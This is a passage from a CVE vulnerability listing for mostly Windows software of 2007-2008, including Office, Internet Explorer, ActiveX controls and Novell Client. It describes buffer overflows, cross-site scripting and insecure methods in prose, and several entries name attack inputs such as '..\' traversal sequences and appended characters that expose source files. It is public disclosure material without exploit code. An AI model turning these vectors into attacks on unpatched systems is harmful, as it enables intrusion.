attackers to inject arbitrary web script or HTML via a crafted URL that is not properly handled in the error page. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0766] Stack-based buffer overflow in RpmSrvc.exe in Brooks Remote Print Manager (RPM) 4.5.1.11 and earlier (Elite and Select) for Windows allows remote attackers to execute arbitrary code via a long filename in a "Receive data file" LPD command. NOTE: some of these details are obtained from third party information. [CVE-2008-0764] Format string vulnerability in the logging function in Larson Network Print Server (LstNPS) 9.4.2 build 105 and earlier for Windows might allow remote attackers to execute arbitrary code via format string specifiers in a USEP command on TCP port 3114. [CVE-2008-0663] Novell Challenge Response Client (LCM) 2.7.5 and earlier, as used with Novell Client for Windows 4.91 SP4, allows users with physical access to a locked system to obtain contents of the clipboard by pasting the contents into the Challenge Question field. [CVE-2008-0662] The Auto Local Logon feature in Check Point VPN-1 SecuRemote/SecureClient NGX R60 and R56 for Windows caches credentials under the Checkpoint\SecuRemote registry key, which has Everyone/Full Control permissions, which allows local users to gain privileges by reading and reusing the credentials. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0583] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Description and unspecified other metadata fields of a Metacafe movie submitted by Metacafe Pro to the Skype video gallery, accessible through a search within the (1) "Add video to chat" or (2) "Add video to mood" dialog, a different vector than CVE-2008-0454. [CVE-2008-0582] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler. [CVE-2008-0533] Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. [CVE-2008-0532] Multiple buffer overflows in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to execute arbitrary code via a long argument located immediately after the Logout argument, and possibly unspecified other vectors. [CVE-2008-0454] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Title field of a (1) Dailymotion and possibly (2) Metacafe movie in the Skype video gallery, accessible through a search within the "Add video to chat" dialog, aka "videomood XSS." [CVE-2008-0392] Multiple buffer overflows in Microsoft Visual Basic Enterprise Edition 6.0 SP6 allow user-assisted remote attackers to execute arbitrary code via a .dsr file with a long (1) ConnectionName or (2) CommandName line. [CVE-2008-0296] Heap-based buffer overflow in the libaccess_realrtsp plugin in VideoLAN VLC Media Player 0.8.6d and earlier on Windows might allow remote RTSP servers to cause a denial of service (application crash) or execute arbitrary code via a long string. [CVE-2008-0250] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line. [CVE-2008-0237] The Microsoft Rich Textbox ActiveX Control (RICHTX32.OCX) 6.1.97.82 allows remote attackers to execute arbitrary commands by invoking the insecure SaveFile method. [CVE-2008-0236] An ActiveX control for Microsoft Visual FoxPro (vfp6r.dll 6.0.8862.0) allows remote attackers to execute arbitrary commands by invoking the DoCmd method. [CVE-2008-0235] The Microsoft VFP_OLE_Server ActiveX control allows remote attackers to execute arbitrary code by invoking the foxcommand method. [CVE-2008-0121] A "memory calculation error" in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with an invalid picture index that triggers memory corruption, aka "Memory Calculation Vulnerability." [CVE-2008-0120] Integer overflow in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with a malformed picture index that triggers memory corruption, related to handling of CString objects, aka "Memory Allocation Vulnerability." [CVE-2008-0119] Unspecified vulnerability in Microsoft Publisher in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 SP1 and earlier allows remote attackers to execute arbitrary code via a Publisher file with crafted object header data that triggers memory corruption, aka "Publisher Object Handler Validation Vulnerability." [CVE-2008-0118] Unspecified vulnerability in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, Excel Viewer 2003 up to SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption from an "allocation error," aka "Microsoft Office Memory Corruption Vulnerability." [CVE-2008-0117] Unspecified vulnerability in Microsoft Excel 2000 SP3 and 2002 SP2, and Office 2004 and 2008 for Mac, allows user-assisted remote attackers to execute arbitrary code via crafted conditional formatting values, aka "Excel Conditional Formatting Vulnerability." [CVE-2008-0116] Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, Compatibility Pack, and Office 2004 and 2008 for Mac allows user-assisted remote attackers to execute arbitrary code via malformed tags in rich text, aka "Excel Rich Text Validation Vulnerability." [CVE-2008-0115] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via malformed formulas, aka "Excel Formula Parsing Vulnerability." [CVE-2008-0114] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via crafted Style records that trigger memory corruption. [CVE-2008-0113] Unspecified vulnerability in Microsoft Office Excel Viewer 2003 up to SP3 allows user-assisted remote attackers to execute arbitrary code via an Excel document with malformed cell comments that trigger memory corruption from an "allocation error," aka "Microsoft Office Cell Parsing Memory Corruption Vulnerability." [CVE-2008-0112] Unspecified vulnerability in Microsoft Excel 2000 SP3, and Office for Mac 2004 and 2008 allows user-assisted remote attackers to execute arbitrary code via a crafted .SLK file that is not properly handled when importing the file, aka "Excel File Import Vulnerability." [CVE-2008-0111] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted data validation records, aka "Excel Data Validation Record Vulnerability." [CVE-2008-0110] Unspecified vulnerability in Microsoft Outlook in Office 2000 SP3, XP SP3, 2003 SP2 and Sp3, and Office System allows user-assisted remote attackers to execute arbitrary code via a crafted mailto URI. [CVE-2008-0109] Word in Microsoft Office 2000 SP3, XP SP3, Office 2003 SP2, and Office Word Viewer 2003 allows remote attackers to execute arbitrary code via crafted fields within the File Information Block (FIB) of a Word file, which triggers length calculation errors and memory corruption. [CVE-2008-0108] Stack-based buffer overflow in wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted field lengths, aka "Microsoft Works File Converter Field Length Vulnerability." [CVE-2008-0106] Buffer overflow in Microsoft SQL Server 2005 SP1 and SP2, and 2005 Express Edition SP1 and SP2, allows remote authenticated users to execute arbitrary code via a crafted insert statement. [CVE-2008-0105] Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section header index table information, aka "Microsoft Works File Converter Index Table Vulnerability." [CVE-2008-0104] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, aka "Publisher Memory Corruption Vulnerability." [CVE-2008-0103] Unspecified vulnerability in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Office document that contains a malformed object, related to a "memory handling error," aka "Microsoft Office Execution Jump Vulnerability." [CVE-2008-0102] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, related to invalid "memory values," aka "Publisher Invalid Memory Reference Vulnerability." [CVE-2008-0086] Buffer overflow in the convert function in Microsoft SQL Server 2000 SP4, 2000 Desktop Engine (MSDE 2000) SP4, and 2000 Desktop Engine (WMSDE) allows remote authenticated users to execute arbitrary code via a crafted SQL expression. [CVE-2008-0082] An ActiveX control (Messenger.UIAutomation.1) in Windows Messenger 4.7 and 5.1 is marked as safe-for-scripting, which allows remote attackers to control the Messenger application, and "change state," obtain contact information, and establish audio or video connections without notification via unknown vectors. [CVE-2008-0081] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted macros, aka "Macro Validation Vulnerability," a different vulnerability than CVE-2007-3490. [CVE-2008-0078] Unspecified vulnerability in an ActiveX control (dxtmsft.dll) in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via a crafted image, aka "Argument Handling Memory Corruption Vulnerability." [CVE-2008-0077] Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka "Property Memory Corruption Vulnerability." [CVE-2008-0076] Unspecified vulnerability in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via crafted HTML layout combinations, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-0075] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 through 6.0 allows remote attackers to execute arbitrary code via crafted inputs to ASP pages. [CVE-2008-0074] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows local users to gain privileges via unknown vectors related to file change notifications in the TPRoot, NNTPFile\Root, or WWWRoot folders. [CVE-2008-0064] Stack-based buffer overflow in Pierre-emmanuel Gougelet (1) XnView 1.91 and 1.92, (2) NConvert 4.85, and (3) libgfl280.dll in GFL SDK 2.870 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted Radiance RGBE (.hdr) file. [CVE-2008-0011] Microsoft DirectX 8.1 through 9.0c, and DirectX on Microsoft XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, does not properly perform MJPEG error checking, which allows remote attackers to execute arbitrary code via a crafted MJPEG stream in a (1) AVI or (2) ASF file, aka the "MJPEG Decoder Vulnerability." [CVE-2007-6724] Vidalia bundle before 0.1.2.18, when running on Windows, installs Privoxy with a configuration file (config.txt or config) that contains an insecure enable-remote-http-toggle setting, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6723] TorK before 0.22, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6722] Vidalia bundle before 0.1.2.18, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6705] The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6571] Cross-site scripting (XSS) vulnerability in Sun Java System Web Proxy Server 3.6 before SP11 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6611356. [CVE-2007-6534] Multiple unspecified vulnerabilities in Microsoft Office Publisher allow user-assisted remote attackers to cause a denial of service (application crash) via a crafted PUB file, possibly involving wordart. [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6471] Incomplete blacklist vulnerability in main.php in phPay 2.02.01 on Windows allows remote attackers to conduct directory traversal attacks and include and execute arbitrary local files via a ..\ (dot dot backslash) in the config parameter. [CVE-2007-6423] * DISPUTED Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue. [CVE-2007-6405] Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to download arbitrary CGI programs or scripts via a URI with an appended (1) '+' character, (2) '.' character, (3) %2e sequence (hex-encoded dot), or (4) hex-encoded character greater than 0x7f. NOTE: the %20 vector is already covered by CVE-2007-3407. [CVE-2007-6404] Directory traversal vulnerability in Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the URI. [CVE-2007-6357] Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944. [CVE-2007-6349] P4Webs.exe in Perforce P4Web 2006.2 and earlier, when running on Windows, allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with an empty body and a Content-Length greater than 0. [CVE-2007-6334] Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges. [CVE-2007-6331] Absolute path traversal vulnerability in the HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier allows remote attackers to execute arbitrary programs via the first argument to the LaunchApp method. NOTE: only a user-assisted attack is possible on Windows Vista. [CVE-2007-6329] Microsoft Office 2007 12.0.6015.5000 and MSO 12.0.6017.5000 do not sign the metadata of Office Open XML (OOXML) documents, which makes it easier for remote attackers to modify Dublin Core metadata fields, as demonstrated by the (1) LastModifiedBy and (2) creator fields in docProps/core.xml in the OOXML ZIP container. [CVE-2007-6326] Sergey Lyubka Simple HTTPD (shttpd) 1.3 on Windows allows remote attackers to cause a denial of service via a request that includes an MS-DOS device name, as demonstrated by the /aux URI. [CVE-2007-6255] Buffer overflow in the Microsoft HeartbeatCtl ActiveX control in HRTBEAT.OCX allows remote attackers to execute arbitrary code via the Host argument to an unspecified method. [CVE-2007-6238] Unspecified vulnerability in Apple QuickTime 7.2 on Windows XP allows remote attackers to execute arbitrary code via unknown attack vectors, probably a different vulnerability than CVE-2007-6166. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release advisories with actionable information. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. However, the organization has stated that this is different than CVE-2007-6166. [CVE-2007-6227] QEMU 0.9.0 allows local users of a Windows XP SP2 guest operating system to overwrite the TranslationBlock (code_gen_buffer) buffer, and probably have unspecified other impacts related to an "overflow," via certain Windows executable programs, as demonstrated by qemu-dos.com. [CVE-2007-6166] Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header. [CVE-2007-6146] Hitachi JP1/File Transmission Server/FTP 01-00 through 08-10-02 on Windows might allow remote attackers to cause a denial of service (service stop) via a "specific file" argument to an FTP command. [CVE-2007-6081] AdventNet EventLog Analyzer build 4030 for Windows, and possibly other versions and platforms, installs a mysql instance with a default "root" account without a password, which allows remote attackers to gain privileges and modify logs. [CVE-2007-6026] Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944. [CVE-2007-6017] The PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, exposes the unsafe Save method, which allows remote attackers to cause a denial of service (browser crash), or create or overwrite arbitrary files, via string values of the (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, and (19) _MonthText11 properties. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-6016] Multiple stack-based buffer overflows in the PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, allow remote attackers to execute arbitrary code via a long (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, or (19) _MonthText11 property value when executing the Save method. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-5957] Unspecified vulnerability in IBM Informix Dynamic Server (IDS) 10.00.TC3TL and 11.10.TB4TL on Windows allows attackers to cause a denial of service (application crash) via unspecified SQ_ONASSIST requests. [CVE-2007-5861] Unspecified vulnerability in Spotlight in Apple Mac OS X 10.4.11 allows user-assisted attackers to cause a denial of service (application termination) or execute arbitrary code via a crafted .XLS file that triggers memory corruption in the Microsoft Office Spotlight Importer. [CVE-2007-5667] NWFILTER.SYS in Novell Client 4.91 SP 1 through SP 4 for Windows 2000, XP, and Server 2003 makes the \.\nwfilter device available for arbitrary user-mode input via METHOD_NEITHER IOCTLs, which allows local users to gain privileges by passing a kernel address as an argument and overwriting kernel memory locations. [CVE-2007-5653] The Component Object Model (COM) functions in PHP 5.x on Windows do not follow safe_mode and disable_functions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control Compatibility Flags, executing programs via a function in compatUI.dll, invoking wscript.shell via wscript.exe, invoking Scripting.FileSystemObject via wshom.ocx, and adding users via a function in shgina.dll, related to the com_load_typelib function. [CVE-2007-5636] Buffer overflow in the Nortel UNIStim IP Softphone 2050 allows remote attackers to cause a denial of service (application abort) and possibly execute arbitrary code via a flood of invalid characters to the RTCP port (5678/udp) that triggers a Windows error message, aka "extraneous messaging." [CVE-2007-5618] Unquoted Windows search path vulnerability in the Authorization and other services in VMware Player 1.0.x before 1.0.5 and 2.0 before 2.0.1, VMware Server before 1.0.4, and Workstation 5.x before 5.5.5 and 6.x before 6.0.1 might allow local users to gain privileges via malicious programs. [CVE-2007-5580] Buffer overflow in a certain driver in Cisco Security Agent 4.5.1 before 4.5.1.672, 5.0 before 5.0.0.225, 5.1 before 5.1.0.106, and 5.2 before 5.2.0.238 on Windows allows remote attackers to execute arbitrary code via a crafted SMB packet in a TCP session on port (1) 139 or (2) 445. [CVE-2007-5493] The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded. [CVE-2007-5473] StaticFileHandler.cs in System.Web in Mono before 1.2.5.2, when running on Windows, allows remote attackers to obtain source code of sensitive files via a request containing a trailing (1) space or (2) dot, which is not properly handled by XSP. [CVE-2007-5470] Microsoft Expression Media stores the catalog password in cleartext in the catalog IVC file, which allows local users to obtain sensitive information and gain access to the catalog by reading the IVC file. [CVE-2007-5456] Microsoft Internet Explorer 7 and earlier allows remote attackers to bypass the "File Download - Security Warning" dialog box and download arbitrary .exe files by placing a '?' (question mark) followed by a non-.exe filename after the .exe filename, as demonstrated by (1) .txt, (2) .cda, (3) .log, (4) .dif, (5) .sol, (6) .htt, (7) .itpc, (8) .itms, (9) .dvr-ms, (10) .dib, (11) .asf, (12) .tif, and unspecified other extensions, a different issue than CVE-2004-1331. NOTE: this issue might not cross privilege boundaries, although it does bypass an intended protection mechanism. [CVE-2007-5355] The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct man-in-the-middle (MITM) attacks. [CVE-2007-5347] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via "unexpected method calls to HTML objects," aka "DHTML Object Memory Corruption Vulnerability." [CVE-2007-5344] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via a crafted website using Javascript that creates, modifies, deletes, and accesses document objects using the tags property, which triggers heap corruption, related to uninitialized or deleted objects, a different issue than CVE-2007-3902 and CVE-2007-3903, and a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-5322] Insecure method vulnerability in the FPOLE.OCX 6.0.8450.0 ActiveX control in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary programs by specifying them as an argument to the FoxDoCmd function. [CVE-2007-5302] Multiple cross-site scripting (XSS) vulnerabilities in HP System Management Homepage (SMH) in HP-UX B.11.11, B.11.23, and B.11.31, and SMH before 2.1.10 for Linux and Windows, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5277] Microsoft Internet Explorer 6 drops DNS pins based on failed connections to irrelevant TCP ports, which makes it easier for remote attackers to conduct DNS rebinding attacks, as demonstrated by a port 81 URL in an IMG SRC, when the DNS pin had been established for a session on port 80, a different issue than CVE-2006-4560. [CVE-2007-5250] The Windows dedicated server for the Unreal engine, as used by America's Army and America's Army Special Forces 2.8.2 and earlier, when Punkbuster (PB) is enabled, allows remote attackers to cause a denial of service (server hang) via packets containing 0x07 characters or other unspecified invalid characters. NOTE: this issue may overlap CVE-2007-4443. NOTE: this issue might be in Punkbuster itself, but there are insufficient details to be certain. [CVE-2007-5236] Java Web Start in Sun JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier, on Windows does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read local files via an untrusted application. [CVE-2007-5169] Stack-based buffer overflow in MAIPM6.dll in Adobe PageMaker 7.0.1 and 7.0.2 on Windows allows user-assisted remote attackers to execute arbitrary code via a long font name in a .PMD file. [CVE-2007-5158] The focus handling for the onkeydown event in Microsoft Internet Explorer 6.0 allows remote attackers to change field focus and copy keystrokes via a certain use of a JavaScript htmlFor attribute, as demonstrated by changing focus from a textarea to a file upload field, a related issue to CVE-2007-3511. [CVE-2007-5144] Buffer overflow in the GDI engine in Windows Live Messenger, as used for Windows MSN Live 8.1, allows user-assisted remote attackers to cause a denial of service (application crash or system crash) and possibly execute arbitrary code by placing a malformed file in a new folder under the Sharing Folders path, and triggering a synchronize operation through the Windows MSN Live online service, possibly related to extended file attributes and possibly related to an incomplete fix for MS07-046, as demonstrated by a (1) .jpg, (2) .gif, (3) .wmf, (4) .doc, or (5) .ico file. [CVE-2007-5143] F-Secure Anti-Virus for Windows Servers 7.0 64-bit edition allows local users to bypass virus scanning by using the system32 directory to store a crafted (1) archive or (2) packed executable. NOTE: in many environments, this does not cross privilege boundaries because any process able to write to system32 could also shut off F-Secure Anti-Virus. [CVE-2007-5128] SimpNews 2.41.03 on Windows, when PHP before 5.0.0 is used, allows remote attackers to obtain sensitive information via an certain link_date parameter to events.php, which reveals the path in an error message due to an unsupported argument type for the mktime function on Windows. [CVE-2007-5126] Unspecified vulnerability in the client in Symantec Veritas Backup Exec for Windows Servers 11d has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-5090] Unspecified vulnerability in IBM Rational ClearQuest (CQ), when a Microsoft SQL Server or an IBM DB2 database is used, allows attackers to corrupt data via unspecified vectors. [CVE-2007-5080] Integer overflow in RealNetworks RealPlayer 10 and 10.5, RealOne Player 1, and RealPlayer Enterprise for Windows allows remote attackers to execute arbitrary code via a crafted Lyrics3 2.00 tag in an MP3 file, resulting in a heap-based buffer overflow. [CVE-2007-5066] Unspecified vulnerability in Webmin before 1.370 on Windows allows remote authenticated users to execute arbitrary commands via a crafted URL. [CVE-2007-5023] Unquoted Windows search path vulnerability in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075, and Server before 1.0.4 Build 56528 allows local users to gain privileges via unspecified vectors, possibly involving a malicious "program.exe" file in the C: folder. [CVE-2007-5020] Unspecified vulnerability in Adobe Acrobat and Reader 8.1 on Windows allows remote attackers to execute arbitrary code via a crafted PDF file, related to the mailto: option and Internet Explorer 7 on Windows XP. NOTE: this information is based upon a vague pre-advisory by a reliable researcher. [CVE-2007-4991] The SOCKS4 Proxy in Microsoft Internet Security and Acceleration (ISA) Server 2004 SP1 and SP2 allows remote attackers to obtain potentially sensitive information (the destination IP address of another user's session) via an empty packet. [CVE-2007-4972] RegMon 7.04 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks to the (1) NtCreateKey and (2) NtOpenKey Windows Native API functions. [CVE-2007-4971] ProSecurity 1.40 Beta 2 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteFile, (3) NtLoadDriver, (4) NtOpenSection, and (5) NtSetSystemTime. [CVE-2007-4970] ProcessGuard 3.410 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateFile, (2) NtCreateKey, (3) NtDeleteValueKey, (4) NtOpenFile, (5) NtOpenKey, and (6) NtSetValueKey. [CVE-2007-4969] Process Monitor 1.22 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteValueKey, (3) NtLoadKey, (4) NtOpenKey, (5) NtQueryValueKey, (6) NtSetValueKey, and (7) NtUnloadKey. [CVE-2007-4967] Online Armor Personal Firewall 2.0.1.215 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtAllocateVirtualMemory, (2) NtConnectPort, (3) NtCreateFile, (4) NtCreateKey, (5) NtCreatePort, (6) NtDeleteFile, (7) NtDeleteValueKey, (8) NtLoadKey, (9) NtOpenFile, (10) NtOpenProcess, (11) NtOpenThread, (12) NtResumeThread, (13) NtSetContextThread, (14) NtSetValueKey, (15) NtSuspendProcess, (16) NtSuspendThread, and (17) NtTerminateThread. [CVE-2007-4931] HP System Management Homepage (SMH) for Windows, when used in conjunction with HP Version Control Agent or Version Control Repository Manager, leaves old OpenSSL software active after an OpenSSL update, which has unknown impact and attack vectors, probably related to previous vulnerabilities for OpenSSL. [CVE-2007-4916] Heap-based buffer overflow in the FileFind::FindFile method in (1) MFC42.dll, (2) MFC42u.dll, (3) MFC71.dll, and (4) MFC71u.dll in Microsoft Foundation Class (MFC) Library 8.0, as used by the ListFiles method in hpqutil.dll 2.0.0.138 in Hewlett-Packard (HP) All-in-One and Photo & Imaging Gallery 1.1 and probably other products, allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long first argument. [CVE-2007-4892] Multiple SQL injection vulnerabilities in SWSoft Plesk 7.6.1, 8.1.0, 8.1.1, and 8.2.0 for Windows allow remote attackers to execute arbitrary SQL commands via a PLESKSESSID cookie to (1) login.php3 or (2) auth.php3. [CVE-2007-4891] A certain ActiveX control in PDWizard.ocx 6.0.0.9782 and earlier in Microsoft Visual Studio 6.0 exposes dangerous (1) StartProcess, (2) SyncShell, (3) SaveAs, (4) CABDefaultURL, (5) CABFileName, and (6) CABRunFile methods, which allows remote attackers to execute arbitrary programs and have other impacts, as demonstrated using absolute pathnames in arguments to StartProcess and SyncShell. [CVE-2007-4890] Absolute directory traversal 